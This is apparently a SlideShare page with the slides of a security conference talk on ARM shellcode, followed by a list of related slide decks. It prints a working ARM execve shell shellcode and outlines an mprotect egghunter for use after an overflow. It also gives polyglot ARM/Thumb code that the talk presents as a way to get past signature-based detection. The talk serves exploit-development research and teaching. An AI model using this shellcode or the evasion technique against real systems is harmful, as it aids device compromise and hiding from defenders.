SlideShare ist ein Scribd-Unternehmen logo

Make ARM Shellcode Great Again - HITB2018PEK

Saumil Shah
Saumil Shah

The document discusses ARM shellcode and techniques for overcoming limitations on ARM shellcode size. It begins with an example of a simple ARM execve shellcode. It then covers techniques for shellcode in tight spaces, including overwriting variables and using an egghunter. An mprotect egghunter is demonstrated that can make shellcode executable by changing memory permissions. The document also introduces a "Quantum Leap" shellcode that uses ARM and Thumb instructions to allow a single shellcode to work on both ARM and Thumb-only systems. It discusses the encoding of ARM and Thumb instructions and how they can be used conditionally and complementarily to implement the Quantum Leap technique.

Software
1 von 25
NETSQUARE (c) SAUMIL SHAH#HITB2018PEK Make ARM Shellcode Great Again #HITB2018PEK
NETSQUARE (c) SAUMIL SHAH#HITB2018PEK # who am i CEO Net-square. • Hacker, Speaker, Trainer, Author. • M.S. Computer Science Purdue University. • LinkedIn: saumilshah • Twitter: @therealsaumil
NETSQUARE (c) SAUMIL SHAH#HITB2018PEK Agenda • A background on ARM shellcode • My research around ARM shellcode – space limitations - ARM mprotect Egghunter – polyglot tricks - ARM Quantum Leap shellcode • Demos
NETSQUARE (c) SAUMIL SHAH#HITB2018PEK Example: ARM execve() Shellcode .section .text .global _start _start: .code 32 add r1, pc, #1 bx r1 .code 16 adr r0, SHELL eor r1, r1, r1 eor r2, r2, r2 strb r2, [r0, #7] mov r7, #11 svc #1 .balign 4 SHELL: .ascii "/bin/shX" Switch to Thumb mode: branch pc + 1 ARM CODE 00: e28f1001 add r1, pc, #1 04: e12fff11 bx r1 THUMB CODE 08: a002 add r0, pc, #8 0a: 4049 eors r1, r1 0c: 4052 eors r2, r2 0e: 71c2 strb r2, [r0, #7] 10: 270b movs r7, #11 12: df01 svc 1 LITERAL POOL 14: 6e69622f .word 0x6e69622f 18: 5868732f .word 0x5868732f
NETSQUARE (c) SAUMIL SHAH#HITB2018PEK 31 30 29 28 27 26 25 24 23 22 21 20 19 18 17 16 15 14 13 12 11 10 9 8 7 6 5 4 3 2 1 0 1 1 1 0 0 0 1 1 1 0 1 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 1 1 1 condition mov operand1 r1 #7 ARM and THUMB Encoding 15 14 13 12 11 10 9 8 7 6 5 4 3 2 1 0 0 0 1 0 0 0 0 1 0 0 0 0 0 1 1 1 mov r1 #7 mov r1, #7 32 bit ARM instruction 16 bit Thumb instruction
NETSQUARE (c) SAUMIL SHAH#HITB2018PEK heap stack Lib Lib Binary overflow pointer ROP shellcode shellcode shellcode Shellcode in tight spaces • What if payload exceeds size "constraints"? – Overwrite local variables. – Bottom of the stack. • Many solutions. SEGFAULT! SEGFAULT!
NETSQUARE (c) SAUMIL SHAH#HITB2018PEK Egghunter • Searches for an EGG (4+4 byte value) in the process memory. • Uses syscalls to determine whether a memory page exists or not (safely). • Upon finding it, Egghunter transfers the control to the code following the EGG. • Nothing new here - done before.
NETSQUARE (c) SAUMIL SHAH#HITB2018PEK Egghunter heap stack Lib Lib Binary shellcodeHACKHACK overflow ROP egghunter RWX - by ROP chain Search for HACK+HACK one page at a time. gef> vmmap Start End Perm Path 0x00008000 0x00009000 rw- /home/pi/eggbreak 0x00010000 0x00011000 rw- /home/pi/eggbreak 0x00011000 0x00032000 rw- [heap] 0xb6e9c000 0xb6fbe000 r-x /lib/arm-linux-gnueabihf/libc-2.13.so 0xb6fbe000 0xb6fc5000 --- /lib/arm-linux-gnueabihf/libc-2.13.so 0xb6fc5000 0xb6fc7000 r-- /lib/arm-linux-gnueabihf/libc-2.13.so 0xb6fc7000 0xb6fc8000 rw- /lib/arm-linux-gnueabihf/libc-2.13.so 0xb6fc8000 0xb6fcb000 rw- 0xb6fd8000 0xb6ff5000 r-x /lib/arm-linux-gnueabihf/ld-2.13.so 0xb6ffa000 0xb6ffd000 rw- 0xb6ffd000 0xb6ffe000 r-- /lib/arm-linux-gnueabihf/ld-2.13.so 0xb6ffe000 0xb6fff000 rw- /lib/arm-linux-gnueabihf/ld-2.13.so 0xb6fff000 0xb7000000 r-x [sigpage] 0xbefdf000 0xbeffe000 rw- 0xbeffe000 0xbf000000 rwx [stack] memory page not executable shellcode shellcode
NETSQUARE (c) SAUMIL SHAH#HITB2018PEK Egghunter - DEP • If EGG+shellcode is in a different memory region, then it may not be executable – Overflow in the stack – Shellcode in the heap • Enter the mprotect egghunter!
NETSQUARE (c) SAUMIL SHAH#HITB2018PEK mprotect Egghunter heap stack Lib Lib Binary shellcodeHACKHACK overflow ROP mprotect egghunter RWX RWX RWX RWX RWX RWX RWX gef> vmmap Start End Perm Path 0x00008000 0x00009000 rwx /home/pi/eggbreak 0x00010000 0x00011000 rwx /home/pi/eggbreak 0x00011000 0x00012000 rwx [heap] 0x00012000 0x00032000 rw- [heap] 0xb6e9c000 0xb6fbe000 r-x /lib/arm-linux-gnueabihf/libc-2.13.so 0xb6fbe000 0xb6fc5000 --- /lib/arm-linux-gnueabihf/libc-2.13.so 0xb6fc5000 0xb6fc7000 r-- /lib/arm-linux-gnueabihf/libc-2.13.so 0xb6fc7000 0xb6fc8000 rw- /lib/arm-linux-gnueabihf/libc-2.13.so 0xb6fc8000 0xb6fcb000 rw- 0xb6fd8000 0xb6ff5000 r-x /lib/arm-linux-gnueabihf/ld-2.13.so 0xb6ffa000 0xb6ffd000 rw- 0xb6ffd000 0xb6ffe000 r-- /lib/arm-linux-gnueabihf/ld-2.13.so 0xb6ffe000 0xb6fff000 rw- /lib/arm-linux-gnueabihf/ld-2.13.so 0xb6fff000 0xb7000000 r-x [sigpage] 0xbefdf000 0xbeffe000 rw- 0xbeffe000 0xbf000000 rwx [stack] shellcode shellcode
NETSQUARE (c) SAUMIL SHAH#HITB2018PEK mprotect Egghunter DEMO
NETSQUARE (c) SAUMIL SHAH#HITB2018PEK Example: ARM execve() Shellcode .section .text .global _start _start: .code 32 add r1, pc, #1 bx r1 .code 16 adr r0, SHELL eor r1, r1, r1 eor r2, r2, r2 strb r2, [r0, #7] mov r7, #11 svc #1 .balign 4 SHELL: .ascii "/bin/shX" Switch to Thumb mode: branch pc + 1 • Mostly begins with an ARM-to-Thumb mode switch. • Rest of the shellcode implemented in Thumb mode. • Compact, avoids bad characters, etc.
NETSQUARE (c) SAUMIL SHAH#HITB2018PEK Some Concerns / Arguments • The "I can signature this" debate. – YARA Rules, IDS, Bro, blah blah… • What if our target runs on a Thumb-only processor? – for example: Cortex-M One Shellcode To Run Them All !
NETSQUARE (c) SAUMIL SHAH#HITB2018PEK "Quantum Leap" Shellcode Start in THUMB modeStart in ARM mode THUMB shellcode (execve, reverse, …) THUMB shellcode (execve, reverse, …) "LEAP" TO THUMB PASS THROUGH PASS THROUGH PASS THROUGH QUANTUM LEAP Same Same But Different
NETSQUARE (c) SAUMIL SHAH#HITB2018PEK "Quantum Leap" - what we need • An understanding of ARM and Thumb instruction encoding: – ARM instruction: "DO SOMETHING" – 2 THUMB instructions: "PASS THROUGH" • Conditional Execution in ARM instructions – very helpful! • A little bit of luck and perseverance. • Nomenclature Credit: "dialup" @44CON.
NETSQUARE (c) SAUMIL SHAH#HITB2018PEK The ARM to Thumb switch • Avoid "destructive" instructions – Branches, Load/Store, Floating Point, etc. • Should work on ARMv6 (no Thumb2) • Avoid Illegal instructions. 0: e28f1001 add r1, pc, #1 4: e12fff11 bx r1 8: 270b movs r7, #11 a: beff bkpt 0x00ff 0: 1001 asrs r1, r0, #32 2: e28f b.n 524 4: ff11 e12f vrhadd.u16 d14,d1,d31 8: 270b movs r7, #11 a: beff bkpt 0x00ff ORIGINAL ARM CODE "THUMB VIEW"
NETSQUARE (c) SAUMIL SHAH#HITB2018PEK ARM and THUMB decoding - 1 e28f1001 1110 0010 1000 1111 0001 0000 0000 0001 add r1,pc,#1 4 BYTE ARM INSTRUCTION - add r1, pc, #1 conditional opcodestatus operand 1 destination operand 2 Thumb instruction 2 Thumb instruction 1 • Controlled by ARM Opcode and conditional flags. • Part influenced by Operand 1 (ARM). • Trickier to control. • Controlled by Destination and Operand 2 of the ARM instruction. • Easier to control. im m ediate
NETSQUARE (c) SAUMIL SHAH#HITB2018PEK ARM and THUMB decoding - 1 e28f1001 1110 0010 1000 1111 0001 0000 0000 0001 add r1,pc,#1 1001 0001 0000 0000 0001 asrs r1,r0,#32 e28f 1110 0010 1000 1111 b 524 1 ARM INSTRUCTION RESULTING INTO 2 THUMB INSTRUCTIONS: conditional opcodestatus destination operand 2 im m ediate Branch instructions are destructive Thumb Opcode 2 influenced by ARM conditional bits operand 1 Thumb Opcode 1 influenced by ARM destination operand
NETSQUARE (c) SAUMIL SHAH#HITB2018PEK (Un)conditional Instructions • How can we turn an ARM instruction into a conditional instruction… • …with guaranteed execution everytime? • COMPLIMENTARY CONDITIONS. • One of the instructions is guaranteed to execute, irrespective of condition flags. e28f1001 add r1, pc, #1 128f1005 addne r1, pc, #5 028f1001 addeq r1, pc, #1 UNCONDITIONAL INSTRUCTION COMPLIMENTARY CONDITIONS
NETSQUARE (c) SAUMIL SHAH#HITB2018PEK ARM and THUMB decoding - 2 128f1005: 0001 0010 1000 1111 0001 0000 0000 0101 addne r1,pc,#5 1005: 0001 0000 0000 0101 asrs r5,r0,#32 128f: 0001 0010 1000 1111 asrs r7,r1,#10 028f1001: 0000 0010 1000 1111 0001 0000 0000 0001 addeq r1,pc,#1 1001: 0001 0000 0000 0001 asrs r1,r0,#32 028f: 0000 0010 1000 1111 lsls r7,r1,#10 USING CONDITIONAL ARM INSTRUCTIONS: conditional opcodestatus destination operand 2 im m ediate No destructive instructions in Thumb mode Complimentary Conditional ARM instructions operand 1
NETSQUARE (c) SAUMIL SHAH#HITB2018PEK Final "Quantum Leap" Code 0: 228fa019 addcs sl, pc, #25 4: 328fa015 addcc sl, pc, #21 8: 21a0400d movcs r4, sp c: 31a0400d movcc r4, sp 10: 292d0412 pushcs {r1, r4, sl} 14: 392d0412 pushcc {r1, r4, sl} 18: 28bda002 popcs {r1, sp, pc} 1c: 38bda002 popcc {r1, sp, pc} 20: beff bkpt 0x00ff 22: beff bkpt 0x00ff 0: a019 add r0, pc, #100 2: 228f movs r2, #143 4: a015 add r0, pc, #84 6: 328f adds r2, #143 8: 400d ands r5, r1 a: 21a0 movs r1, #160 c: 400d ands r5, r1 e: 31a0 adds r1, #160 10: 0412 lsls r2, r2, #16 12: 292d cmp r1, #45 14: 0412 lsls r2, r2, #16 16: 392d subs r1, #45 18: a002 add r0, pc, #8 1a: 28bd cmp r0, #189 1c: a002 add r0, pc, #8 1e: 38bd subs r0, #189 20: beff bkpt 0x00ff 20: beff bkpt 0x00ff QUANTUM LEAP: ARM TO THUMB QUANTUM LEAP: PASS THROUGH (THUMB)
NETSQUARE (c) SAUMIL SHAH#HITB2018PEK Assembling the Quantum Leap • No Thumb2 instructions. • No NULL bytes. • Took many iterations to finalise! • bx sl implemented by push {sl}, pop {pc}. • Register list proved to be a challenge. • Registers r4, sl altered in ARM. • Registers r0, r1, r2, r5 altered in Thumb.
NETSQUARE (c) SAUMIL SHAH#HITB2018PEKDEMO QUANTUM LEAP SHELLCODE
NETSQUARE (c) SAUMIL SHAH#HITB2018PEK Conclusion • ARM/Thumb Polyglot instructions and conditional execution offer many opportunities for obfuscation and signature bypass. • Lots of exploration opportunities in ARM shellcoding. https://github.com/therealsaumil/arm_shellcode
NETSQUARE (c) SAUMIL SHAH#HITB2018PEK exit(0) Saumil Shah @therealsaumil#HITB2018PEK

Empfohlen

ARM Polyglot Shellcode - HITB2019AMS
ARM Polyglot Shellcode - HITB2019AMSARM Polyglot Shellcode - HITB2019AMS
ARM Polyglot Shellcode - HITB2019AMSSaumil Shah
 
Make ARM Shellcode Great Again
Make ARM Shellcode Great AgainMake ARM Shellcode Great Again
Make ARM Shellcode Great AgainSaumil Shah
 
HackLU 2018 Make ARM Shellcode Great Again
HackLU 2018 Make ARM Shellcode Great AgainHackLU 2018 Make ARM Shellcode Great Again
HackLU 2018 Make ARM Shellcode Great AgainSaumil Shah
 
Schrödinger's ARM Assembly
Schrödinger's ARM AssemblySchrödinger's ARM Assembly
Schrödinger's ARM AssemblySaumil Shah
 
SICP勉強会について
SICP勉強会についてSICP勉強会について
SICP勉強会についてYusuke Sasaki
 
Vhdl practical exam guide
Vhdl practical exam guideVhdl practical exam guide
Vhdl practical exam guideEslam Mohammed
 
CODING IN ARDUINO
CODING IN ARDUINOCODING IN ARDUINO
CODING IN ARDUINOS Ayub
 
Using ARM Dev.Board in physical experimental instruments
Using ARM Dev.Board in physical experimental instrumentsUsing ARM Dev.Board in physical experimental instruments
Using ARM Dev.Board in physical experimental instrumentsa_n0v
 

Empfohlen

ARM Polyglot Shellcode - HITB2019AMS
ARM Polyglot Shellcode - HITB2019AMSARM Polyglot Shellcode - HITB2019AMS
ARM Polyglot Shellcode - HITB2019AMSSaumil Shah
 
Make ARM Shellcode Great Again
Make ARM Shellcode Great AgainMake ARM Shellcode Great Again
Make ARM Shellcode Great AgainSaumil Shah
 
HackLU 2018 Make ARM Shellcode Great Again
HackLU 2018 Make ARM Shellcode Great AgainHackLU 2018 Make ARM Shellcode Great Again
HackLU 2018 Make ARM Shellcode Great AgainSaumil Shah
 
Schrödinger's ARM Assembly
Schrödinger's ARM AssemblySchrödinger's ARM Assembly
Schrödinger's ARM AssemblySaumil Shah
 
SICP勉強会について
SICP勉強会についてSICP勉強会について
SICP勉強会についてYusuke Sasaki
 
Vhdl practical exam guide
Vhdl practical exam guideVhdl practical exam guide
Vhdl practical exam guideEslam Mohammed
 
CODING IN ARDUINO
CODING IN ARDUINOCODING IN ARDUINO
CODING IN ARDUINOS Ayub
 
Using ARM Dev.Board in physical experimental instruments
Using ARM Dev.Board in physical experimental instrumentsUsing ARM Dev.Board in physical experimental instruments
Using ARM Dev.Board in physical experimental instrumentsa_n0v
 
W8_2: Inside the UoS Educational Processor
W8_2: Inside the UoS Educational ProcessorW8_2: Inside the UoS Educational Processor
W8_2: Inside the UoS Educational ProcessorDaniel Roggen
 
Verifikation - Metoder og Libraries
Verifikation - Metoder og LibrariesVerifikation - Metoder og Libraries
Verifikation - Metoder og LibrariesInfinIT - Innovationsnetværket for it
 
Introduction to Debuggers
Introduction to DebuggersIntroduction to Debuggers
Introduction to DebuggersSaumil Shah
 
Diagrama de bloques manejo de materiales
Diagrama de bloques manejo de materialesDiagrama de bloques manejo de materiales
Diagrama de bloques manejo de materialesRoberto Díaz
 
Trash Robotic Router Platform - David Melendez - Codemotion Rome 2015
Trash Robotic Router Platform - David Melendez - Codemotion Rome 2015Trash Robotic Router Platform - David Melendez - Codemotion Rome 2015
Trash Robotic Router Platform - David Melendez - Codemotion Rome 2015Codemotion
 
hardware_design_RAFS
hardware_design_RAFShardware_design_RAFS
hardware_design_RAFSPedro Pablo Plazas
 
Dronecode: software open source em drones
Dronecode: software open source em dronesDronecode: software open source em drones
Dronecode: software open source em dronesInternational Drone Day Campinas
 
CET4811_FINAL_LAB
CET4811_FINAL_LABCET4811_FINAL_LAB
CET4811_FINAL_LABClara Irizarry
 
Go Go Gadget! - An Intro to Return Oriented Programming (ROP)
Go Go Gadget! - An Intro to Return Oriented Programming (ROP)Go Go Gadget! - An Intro to Return Oriented Programming (ROP)
Go Go Gadget! - An Intro to Return Oriented Programming (ROP)Miguel Arroyo
 
Hackers vs Hackers
Hackers vs HackersHackers vs Hackers
Hackers vs Hackersjobandesther
 
Crash_Report_Mechanism_In_Tizen
Crash_Report_Mechanism_In_TizenCrash_Report_Mechanism_In_Tizen
Crash_Report_Mechanism_In_TizenLex Yu
 
Tcg
TcgTcg
TcgTian linan
 
Debugging TV Frame 0x05
Debugging TV Frame 0x05Debugging TV Frame 0x05
Debugging TV Frame 0x05Dmitry Vostokov
 
Automatic Generation of Compact Alphanumeric Shellcodes for x86
Automatic Generation of Compact Alphanumeric Shellcodes for x86Automatic Generation of Compact Alphanumeric Shellcodes for x86
Automatic Generation of Compact Alphanumeric Shellcodes for x86Aditya Basu
 
44CON 2014 - Simple Hardware Sidechannel Attacks for 10 GBP or Less, Joe Fitz...
44CON 2014 - Simple Hardware Sidechannel Attacks for 10 GBP or Less, Joe Fitz...44CON 2014 - Simple Hardware Sidechannel Attacks for 10 GBP or Less, Joe Fitz...
44CON 2014 - Simple Hardware Sidechannel Attacks for 10 GBP or Less, Joe Fitz...44CON
 
Kernel Recipes 2016 - Why you need a test strategy for your kernel development
Kernel Recipes 2016 - Why you need a test strategy for your kernel developmentKernel Recipes 2016 - Why you need a test strategy for your kernel development
Kernel Recipes 2016 - Why you need a test strategy for your kernel developmentAnne Nicolas
 
Weapons grade React by Ken Wheeler
Weapons grade React by Ken Wheeler Weapons grade React by Ken Wheeler
Weapons grade React by Ken Wheeler React London 2017
 
SMP Implementation for OpenBSD/sgi [Japanese Edition]
SMP Implementation for OpenBSD/sgi [Japanese Edition]SMP Implementation for OpenBSD/sgi [Japanese Edition]
SMP Implementation for OpenBSD/sgi [Japanese Edition]Takuya ASADA
 
Scale17x buffer overflows
Scale17x buffer overflowsScale17x buffer overflows
Scale17x buffer overflowsjohseg
 
44CON 2013 - Controlling a PC using Arduino
44CON 2013 - Controlling a PC using Arduino44CON 2013 - Controlling a PC using Arduino
44CON 2013 - Controlling a PC using ArduinoMichael Boman
 
Exploring the x64
Exploring the x64Exploring the x64
Exploring the x64FFRI, Inc.
 
Debugging 2013- Jesper Brouer
Debugging 2013- Jesper BrouerDebugging 2013- Jesper Brouer
Debugging 2013- Jesper BrouerMediehuset Ingeniøren Live
 

Weitere ähnliche Inhalte

Was ist angesagt?

W8_2: Inside the UoS Educational Processor
W8_2: Inside the UoS Educational ProcessorW8_2: Inside the UoS Educational Processor
W8_2: Inside the UoS Educational ProcessorDaniel Roggen
 
Introduction to Debuggers
Introduction to DebuggersIntroduction to Debuggers
Introduction to DebuggersSaumil Shah
 
Diagrama de bloques manejo de materiales
Diagrama de bloques manejo de materialesDiagrama de bloques manejo de materiales
Diagrama de bloques manejo de materialesRoberto Díaz
 
Trash Robotic Router Platform - David Melendez - Codemotion Rome 2015
Trash Robotic Router Platform - David Melendez - Codemotion Rome 2015Trash Robotic Router Platform - David Melendez - Codemotion Rome 2015
Trash Robotic Router Platform - David Melendez - Codemotion Rome 2015Codemotion
 
Go Go Gadget! - An Intro to Return Oriented Programming (ROP)
Go Go Gadget! - An Intro to Return Oriented Programming (ROP)Go Go Gadget! - An Intro to Return Oriented Programming (ROP)
Go Go Gadget! - An Intro to Return Oriented Programming (ROP)Miguel Arroyo
 
Hackers vs Hackers
Hackers vs HackersHackers vs Hackers
Hackers vs Hackersjobandesther
 
Crash_Report_Mechanism_In_Tizen
Crash_Report_Mechanism_In_TizenCrash_Report_Mechanism_In_Tizen
Crash_Report_Mechanism_In_TizenLex Yu
 
Automatic Generation of Compact Alphanumeric Shellcodes for x86
Automatic Generation of Compact Alphanumeric Shellcodes for x86Automatic Generation of Compact Alphanumeric Shellcodes for x86
Automatic Generation of Compact Alphanumeric Shellcodes for x86Aditya Basu
 
44CON 2014 - Simple Hardware Sidechannel Attacks for 10 GBP or Less, Joe Fitz...
44CON 2014 - Simple Hardware Sidechannel Attacks for 10 GBP or Less, Joe Fitz...44CON 2014 - Simple Hardware Sidechannel Attacks for 10 GBP or Less, Joe Fitz...
44CON 2014 - Simple Hardware Sidechannel Attacks for 10 GBP or Less, Joe Fitz...44CON
 
Kernel Recipes 2016 - Why you need a test strategy for your kernel development
Kernel Recipes 2016 - Why you need a test strategy for your kernel developmentKernel Recipes 2016 - Why you need a test strategy for your kernel development
Kernel Recipes 2016 - Why you need a test strategy for your kernel developmentAnne Nicolas
 
Weapons grade React by Ken Wheeler
Weapons grade React by Ken Wheeler Weapons grade React by Ken Wheeler
Weapons grade React by Ken Wheeler React London 2017
 
SMP Implementation for OpenBSD/sgi [Japanese Edition]
SMP Implementation for OpenBSD/sgi [Japanese Edition]SMP Implementation for OpenBSD/sgi [Japanese Edition]
SMP Implementation for OpenBSD/sgi [Japanese Edition]Takuya ASADA
 
Scale17x buffer overflows
Scale17x buffer overflowsScale17x buffer overflows
Scale17x buffer overflowsjohseg
 
44CON 2013 - Controlling a PC using Arduino
44CON 2013 - Controlling a PC using Arduino44CON 2013 - Controlling a PC using Arduino
44CON 2013 - Controlling a PC using ArduinoMichael Boman
 

Was ist angesagt? (20)

W8_2: Inside the UoS Educational Processor
W8_2: Inside the UoS Educational ProcessorW8_2: Inside the UoS Educational Processor
W8_2: Inside the UoS Educational Processor
 
Verifikation - Metoder og Libraries
Verifikation - Metoder og LibrariesVerifikation - Metoder og Libraries
Verifikation - Metoder og Libraries
 
Introduction to Debuggers
Introduction to DebuggersIntroduction to Debuggers
Introduction to Debuggers
 
Diagrama de bloques manejo de materiales
Diagrama de bloques manejo de materialesDiagrama de bloques manejo de materiales
Diagrama de bloques manejo de materiales
 
Trash Robotic Router Platform - David Melendez - Codemotion Rome 2015
Trash Robotic Router Platform - David Melendez - Codemotion Rome 2015Trash Robotic Router Platform - David Melendez - Codemotion Rome 2015
Trash Robotic Router Platform - David Melendez - Codemotion Rome 2015
 
hardware_design_RAFS
hardware_design_RAFShardware_design_RAFS
hardware_design_RAFS
 
Dronecode: software open source em drones
Dronecode: software open source em dronesDronecode: software open source em drones
Dronecode: software open source em drones
 
CET4811_FINAL_LAB
CET4811_FINAL_LABCET4811_FINAL_LAB
CET4811_FINAL_LAB
 
Go Go Gadget! - An Intro to Return Oriented Programming (ROP)
Go Go Gadget! - An Intro to Return Oriented Programming (ROP)Go Go Gadget! - An Intro to Return Oriented Programming (ROP)
Go Go Gadget! - An Intro to Return Oriented Programming (ROP)
 
Hackers vs Hackers
Hackers vs HackersHackers vs Hackers
Hackers vs Hackers
 
Crash_Report_Mechanism_In_Tizen
Crash_Report_Mechanism_In_TizenCrash_Report_Mechanism_In_Tizen
Crash_Report_Mechanism_In_Tizen
 
Tcg
TcgTcg
Tcg
 
Debugging TV Frame 0x05
Debugging TV Frame 0x05Debugging TV Frame 0x05
Debugging TV Frame 0x05
 
Automatic Generation of Compact Alphanumeric Shellcodes for x86
Automatic Generation of Compact Alphanumeric Shellcodes for x86Automatic Generation of Compact Alphanumeric Shellcodes for x86
Automatic Generation of Compact Alphanumeric Shellcodes for x86
 
44CON 2014 - Simple Hardware Sidechannel Attacks for 10 GBP or Less, Joe Fitz...
44CON 2014 - Simple Hardware Sidechannel Attacks for 10 GBP or Less, Joe Fitz...44CON 2014 - Simple Hardware Sidechannel Attacks for 10 GBP or Less, Joe Fitz...
44CON 2014 - Simple Hardware Sidechannel Attacks for 10 GBP or Less, Joe Fitz...
 
Kernel Recipes 2016 - Why you need a test strategy for your kernel development
Kernel Recipes 2016 - Why you need a test strategy for your kernel developmentKernel Recipes 2016 - Why you need a test strategy for your kernel development
Kernel Recipes 2016 - Why you need a test strategy for your kernel development
 
Weapons grade React by Ken Wheeler
Weapons grade React by Ken Wheeler Weapons grade React by Ken Wheeler
Weapons grade React by Ken Wheeler
 
SMP Implementation for OpenBSD/sgi [Japanese Edition]
SMP Implementation for OpenBSD/sgi [Japanese Edition]SMP Implementation for OpenBSD/sgi [Japanese Edition]
SMP Implementation for OpenBSD/sgi [Japanese Edition]
 
Scale17x buffer overflows
Scale17x buffer overflowsScale17x buffer overflows
Scale17x buffer overflows
 
44CON 2013 - Controlling a PC using Arduino
44CON 2013 - Controlling a PC using Arduino44CON 2013 - Controlling a PC using Arduino
44CON 2013 - Controlling a PC using Arduino
 

Ähnlich wie Make ARM Shellcode Great Again - HITB2018PEK

Exploring the x64
Exploring the x64Exploring the x64
Exploring the x64FFRI, Inc.
 
Writing Metasploit Plugins
Writing Metasploit PluginsWriting Metasploit Plugins
Writing Metasploit Pluginsamiable_indian
 
Developing Applications for Beagle Bone Black, Raspberry Pi and SoC Single Bo...
Developing Applications for Beagle Bone Black, Raspberry Pi and SoC Single Bo...Developing Applications for Beagle Bone Black, Raspberry Pi and SoC Single Bo...
Developing Applications for Beagle Bone Black, Raspberry Pi and SoC Single Bo...ryancox
 
Basics Of Embedded Systems
Basics Of Embedded SystemsBasics Of Embedded Systems
Basics Of Embedded Systemsarlabstech
 
Chapter_01_See_Program_Running.pptx
Chapter_01_See_Program_Running.pptxChapter_01_See_Program_Running.pptx
Chapter_01_See_Program_Running.pptxWaleedAbdullah2k19EE
 
Reverse engineering of binary programs for custom virtual machines
Reverse engineering of binary programs for custom virtual machinesReverse engineering of binary programs for custom virtual machines
Reverse engineering of binary programs for custom virtual machinesSmartDec
 
Linux+sensor+device-tree+shell=IoT !
Linux+sensor+device-tree+shell=IoT !Linux+sensor+device-tree+shell=IoT !
Linux+sensor+device-tree+shell=IoT !Dobrica Pavlinušić
 
Symbolic Debugging with DWARF
Symbolic Debugging with DWARFSymbolic Debugging with DWARF
Symbolic Debugging with DWARFSamy Bahra
 
Windows Debugging with WinDbg
Windows Debugging with WinDbgWindows Debugging with WinDbg
Windows Debugging with WinDbgArno Huetter
 
Kernel Recipes 2013 - Deciphering Oopsies
Kernel Recipes 2013 - Deciphering OopsiesKernel Recipes 2013 - Deciphering Oopsies
Kernel Recipes 2013 - Deciphering OopsiesAnne Nicolas
 
SFO15-500: VIXL
SFO15-500: VIXLSFO15-500: VIXL
SFO15-500: VIXLLinaro
 
Debugging Ruby Systems
Debugging Ruby SystemsDebugging Ruby Systems
Debugging Ruby SystemsEngine Yard
 
Vectorization on x86: all you need to know
Vectorization on x86: all you need to knowVectorization on x86: all you need to know
Vectorization on x86: all you need to knowRoberto Agostino Vitillo
 

Ähnlich wie Make ARM Shellcode Great Again - HITB2018PEK (20)

Exploring the x64
Exploring the x64Exploring the x64
Exploring the x64
 
Debugging 2013- Jesper Brouer
Debugging 2013- Jesper BrouerDebugging 2013- Jesper Brouer
Debugging 2013- Jesper Brouer
 
Writing Metasploit Plugins
Writing Metasploit PluginsWriting Metasploit Plugins
Writing Metasploit Plugins
 
A Close Look at ARM Code Size
A Close Look at ARM Code SizeA Close Look at ARM Code Size
A Close Look at ARM Code Size
 
Developing Applications for Beagle Bone Black, Raspberry Pi and SoC Single Bo...
Developing Applications for Beagle Bone Black, Raspberry Pi and SoC Single Bo...Developing Applications for Beagle Bone Black, Raspberry Pi and SoC Single Bo...
Developing Applications for Beagle Bone Black, Raspberry Pi and SoC Single Bo...
 
Arm architecture
Arm architectureArm architecture
Arm architecture
 
Basics Of Embedded Systems
Basics Of Embedded SystemsBasics Of Embedded Systems
Basics Of Embedded Systems
 
Chapter_01_See_Program_Running.pptx
Chapter_01_See_Program_Running.pptxChapter_01_See_Program_Running.pptx
Chapter_01_See_Program_Running.pptx
 
RISC-V Zce Extension
RISC-V Zce ExtensionRISC-V Zce Extension
RISC-V Zce Extension
 
Arm architecture overview
Arm architecture overviewArm architecture overview
Arm architecture overview
 
Reverse engineering of binary programs for custom virtual machines
Reverse engineering of binary programs for custom virtual machinesReverse engineering of binary programs for custom virtual machines
Reverse engineering of binary programs for custom virtual machines
 
Linux+sensor+device-tree+shell=IoT !
Linux+sensor+device-tree+shell=IoT !Linux+sensor+device-tree+shell=IoT !
Linux+sensor+device-tree+shell=IoT !
 
Symbolic Debugging with DWARF
Symbolic Debugging with DWARFSymbolic Debugging with DWARF
Symbolic Debugging with DWARF
 
Qemu JIT Code Generator and System Emulation
Qemu JIT Code Generator and System EmulationQemu JIT Code Generator and System Emulation
Qemu JIT Code Generator and System Emulation
 
Windows Debugging with WinDbg
Windows Debugging with WinDbgWindows Debugging with WinDbg
Windows Debugging with WinDbg
 
64-bit Android
64-bit Android64-bit Android
64-bit Android
 
Kernel Recipes 2013 - Deciphering Oopsies
Kernel Recipes 2013 - Deciphering OopsiesKernel Recipes 2013 - Deciphering Oopsies
Kernel Recipes 2013 - Deciphering Oopsies
 
SFO15-500: VIXL
SFO15-500: VIXLSFO15-500: VIXL
SFO15-500: VIXL
 
Debugging Ruby Systems
Debugging Ruby SystemsDebugging Ruby Systems
Debugging Ruby Systems
 
Vectorization on x86: all you need to know
Vectorization on x86: all you need to knowVectorization on x86: all you need to know
Vectorization on x86: all you need to know
 

Mehr von Saumil Shah

The Hand That Strikes, Also Blocks
The Hand That Strikes, Also BlocksThe Hand That Strikes, Also Blocks
The Hand That Strikes, Also BlocksSaumil Shah
 
Debugging with EMUX - RIngzer0 BACK2WORKSHOPS
Debugging with EMUX - RIngzer0 BACK2WORKSHOPSDebugging with EMUX - RIngzer0 BACK2WORKSHOPS
Debugging with EMUX - RIngzer0 BACK2WORKSHOPSSaumil Shah
 
Unveiling EMUX - ARM and MIPS IoT Emulation Framework
Unveiling EMUX - ARM and MIPS IoT Emulation FrameworkUnveiling EMUX - ARM and MIPS IoT Emulation Framework
Unveiling EMUX - ARM and MIPS IoT Emulation FrameworkSaumil Shah
 
Announcing ARMX Docker - DC11332
Announcing ARMX Docker - DC11332Announcing ARMX Docker - DC11332
Announcing ARMX Docker - DC11332Saumil Shah
 
Precise Presentations
Precise PresentationsPrecise Presentations
Precise PresentationsSaumil Shah
 
Effective Webinars: Presentation Skills for a Virtual Audience
Effective Webinars: Presentation Skills for a Virtual AudienceEffective Webinars: Presentation Skills for a Virtual Audience
Effective Webinars: Presentation Skills for a Virtual AudienceSaumil Shah
 
INSIDE ARM-X Cansecwest 2020
INSIDE ARM-X Cansecwest 2020INSIDE ARM-X Cansecwest 2020
INSIDE ARM-X Cansecwest 2020Saumil Shah
 
Cyberspace And Security - India's Decade Ahead
Cyberspace And Security - India's Decade AheadCyberspace And Security - India's Decade Ahead
Cyberspace And Security - India's Decade AheadSaumil Shah
 
Cybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
